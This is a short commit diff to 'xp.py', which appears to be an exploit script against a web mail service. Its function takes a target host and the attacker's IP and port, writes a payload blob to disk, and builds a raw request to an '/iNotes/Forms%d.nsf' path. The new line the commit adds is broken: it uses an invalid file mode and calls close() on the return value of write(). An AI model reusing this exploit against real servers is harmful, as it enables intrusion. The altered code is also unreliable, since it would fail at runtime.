Update xp.py
This commit is contained in:
@@ -49,8 +49,9 @@ def clap(host, port, yourip, yourport):
|
|||||||
print(f"+ curr: {currsize}")
|
print(f"+ curr: {currsize}")
|
||||||
|
|
||||||
|
|
||||||
with open("payload.bin", "wb") as f:
|
# with open("payload.bin", "wb") as f:
|
||||||
f.write(niceone)
|
# f.write(niceone)
|
||||||
|
open("payload.bin", "Wb").write(niceone).close()
|
||||||
|
|
||||||
request = b'GET /iNotes/Forms%d.nsf// HTTP/1.0\r\n'
|
request = b'GET /iNotes/Forms%d.nsf// HTTP/1.0\r\n'
|
||||||
request += f'Host: {host}\r\n'.encode()
|
request += f'Host: {host}\r\n'.encode()
|
||||||
|
|||||||
Reference in New Issue
Block a user